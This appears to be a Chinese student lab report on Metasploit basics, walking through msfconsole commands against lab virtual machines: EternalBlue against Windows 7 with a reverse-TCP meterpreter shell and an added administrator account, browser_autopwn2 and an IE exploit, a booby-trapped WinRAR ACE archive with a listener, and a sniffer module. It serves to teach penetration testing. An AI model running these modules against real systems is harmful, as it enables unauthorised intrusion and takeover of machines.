首页 > 其他分享 >MSF应用基础

MSF应用基础

时间:2023-05-04 23:11:46浏览次数:44  
标签:use set 浏览器 基础 漏洞 exploit run 应用 MSF

MSF应用基础

基础问题回答

  • 用自己的话解释什么是exploit,payload,encode.
    • exploit
    语义上来讲是利用计算机系统或者软件漏洞的行为方式,目的为实现非法或未授权的访问行为。
    在Metasploit框架中,exploit是指利用程序中的漏洞来攻击目标系统的代码,Metasploit框架提供了许多现成的exploit模块,可以用于测试和攻击目标系统。
    
    • payload
    一般是指系统之间传输的数据。而要搞事情时,payload就是运送“攻击代码”过去的东西。
    
    • encode
    编码,将数据从一种格式转换为另一种格式。搞事情的时候,可以将“小黑子”伪装成“我家哥哥的真爱粉”,以躲过系统的扫描。
    
  • 离实战还缺些什么技术或步骤?
    • 对于信息搜集部分,首先掌握的工具熟练度不高而且对于收集到的漏洞信息很难区分出哪些可用哪些不可用。其次是漏洞利用以及渗透,即使找到了几个漏洞,但现代系统通常会采用多种安全措施来保护自身,如防火墙、入侵检测系统、加密等。渗透测试需要了解这些安全措施的工作原理和弱点,才能绕过它们。

实验过程

1.主动攻击实践

windows系统漏洞攻击

如果 win7 有防火墙拦截,那么就要让防火墙放过 SMB 服务的相关数据包。

use auxiliary/scanner/smb/smb_version 
set RHOSTS 192.168.178.132
run


利用win7漏洞--永恒之蓝,进行攻击。

use exploit/windows/smb/ms17_010_eternalblue 
(default payload windows/x64/meterpreter/reverse_tcp)
set RHOSTS 192.168.178.132
run

msf 开始自动使用 auxiliary/scanner/smb/smb_ms17_010 检查永恒之蓝漏洞,并自动探测靶机系统版本。
最终拿到了 shell。此过程中 win7 防火墙是开启状态。



最终得到的是管理员权限,成功添加 hacker 用户,并设置为了管理员

2.针对浏览器的攻击

2.1 msf自动化攻击

browser_autopwn是Metasploit提供的辅助功能模块。在用户访问Web页面时,它会自动攻击受害者的浏览器。在开始攻击之前,browser_autopwn能够检测用户使用的浏览器类型, browser_autopwn将根据浏览器的检测结果,自行部署最合适的exploit。

use auxiliary/server/browser_autopwn2
run

之后会生成一个 URL

主机 win10 + 联想浏览器(Chrome内核) 访问,它说没有合适的可以利用的漏洞。
虚拟机 win7 + Internet Explorer 访问,它说有漏洞可以利用,但半天也没返回一个会话。

2.2 msf和IE浏览器

先看看IE浏览器的
search Internet Explorer

use exploit/windows/browser/ms11_003_ie_css_import 
set LHOST 192.168.178.130
run


3.针对客户端的攻击

winrar

msf生成有毒的ace文件

use exploit/windows/fileformat/winrar_ace
set LHOST 192.168.178.130
run


msf启动监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.178.130
run

受害者winrar解压ace文件
版本要求 :WinRAR <= 5.61

重启
msf拿到shell
shell是当前用户权限,可以配合其他漏洞和POST模块进行提权

4.辅助模块的使用

使用嗅探模块
use auxiliary/sniffer/psnuffle

实践总结与体会

metasploit 的子模块分类很多是按照漏洞的平台和类型进行分类的,要想精准地定位自己想要的漏洞,就要首先了解漏洞的功能、类型和适用的平台版本。metasploit 的模块真的很多,功能也很强大,要想用好metasploit,就要耐得住寂寞,逐渐掌握各个模块。不多说了,继续学习研究······

标签:use,set,浏览器,基础,漏洞,exploit,run,应用,MSF
From: https://www.cnblogs.com/RookieHacker1230/p/17372834.html

相关文章

  • Exp6 MSF应用基础
    目录一、实践内容二、实践过程(一)创建靶机(二)一个主动攻击实践1.利用ms08_067漏洞攻击WindowsXP2.利用ms17_010_eternalblue漏洞攻击Windows(三)一个针对浏览器的攻击1.利用ms06_013_createtextrange漏洞攻击WindowsXPSP3的IE浏览器(1)设计攻击模块及参数(四)一个针对客户端的攻击1.Ad......
  • 网络对抗实验六 MSF应用基础--20201313
    《网络对抗技术》——Exp6MSF应用基础目录《网络对抗技术》——Exp6MSF应用基础一、实践内容二、问题回答三、实践过程实验准备:1、一个主动攻击实践ms08_067_netapi2、一个针对浏览器的攻击ms10_018_ie_behaviors3、一个针对客户端的攻击Wireshark4、成功应用一个辅助模块sniff......
  • Exp6 MSF应用基础
    目录一.实验信息二.实验内容三.实验知识四.实验过程4.1一个主动攻击实践(ms17_010)4.2一个针对浏览器的攻击(ms10_018)4.3一个针对客户端的攻击4.4成功应用任何一个辅助模块(scannerport)五.基础问题回答六.实验总结体会一.实验信息课程名称:网络对抗技术实验序号:6实验名称:MSF......
  • 【nodejs基础】模块加载机制及npm指令详解03
    1.模块化的基本概念模块化:是指解决一个复杂问题时,自顶向下逐层把系统划分成若干模块的过程。对于整个系统来说,模块是可组合、分解和更换的单元编程领域中的模块化,就是遵守固定的规则,把一个大文件拆成独立并互相依赖的多个小模块。把代码进行模块化拆分的好处*提高了代码的复......
  • 《网络对抗技术》——Exp6 MSF应用基础
    目录一、实践内容二、实践原理三、实践过程1、一个主动攻击实践4.2针对浏览器的攻击3、一个针对客户端的攻击4、成功应用一个辅助模块四、实践问题回答五、离实践还缺什么技术或步骤六、实践心得体会一、实践内容本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻......
  • 网络对抗实验六 MSF应用基础
    Exp6MSF应用基础实验目标1.1一个主动攻击实践,尽量使用最新的类似漏洞;(1分)1.2一个针对浏览器的攻击,尽量使用最新的类似漏洞;(1分)1.3一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;(1分)1.4成功应用任何一个辅助模块。(1分)实验内容0实验准备0.1实验原理0.1.......
  • 基础动态规划
    P1880[NOI1995]石子合并题解区间DP。首先将其复制一遍(因为是环)。设\(f[i][j]\)表示将\(i\)到\(j\)段的石子合并需要的次数。有\[f[i][j]=0(i=j)\]\[f[i][j]=min(max)\{f[i][k]+f[k+1][j]+\sum_{k=i}^{j}a[k](i\leqk<j)\}\]#include<iostream>......
  • 20201306 Exp6 MSF应用基础
    一、实践内容二、实践原理三、实践过程1、一个主动攻击实践ms08_067_netapims17_0102、一个针对浏览器的攻击ms14_064ms17-0103、一个针对客户端的攻击AdobeWireshark4、成功应用一个辅助模块sniffer嗅探portscan端口扫描MSF使用nmap四、实践问题回答五、离实践......
  • 矩阵基础知识
    文章目录1.矩阵的一些基础知识1.1矩阵只有乘法1.2向量有点乘(也是内积)和叉乘:1.3单位向量1.4正交矩阵1.5线性无关和线性相关的向量1.6矩阵的逆1.7对称矩阵1.7矩阵的秩(rank)1.8伴随矩阵1.9矩阵的零空间1.10矩阵的扩展基定理1.矩阵的一些基础知识1.1矩阵只有乘法1.2向量......
  • transformers在ctr中的应用
    文章目录1.背景2.相关论文解析2.1《AutoInt:AutomaticFeatureInteractionLearningviaSelf-AttentiveNeuralNetworks》2.1.1论文贡献2.1.2模型结构2.1.2.1输入2.1.2.2注意力机制层2.1.3实验结果2.2《BehaviorSequenceTransformerforE-commerceRecommendationin......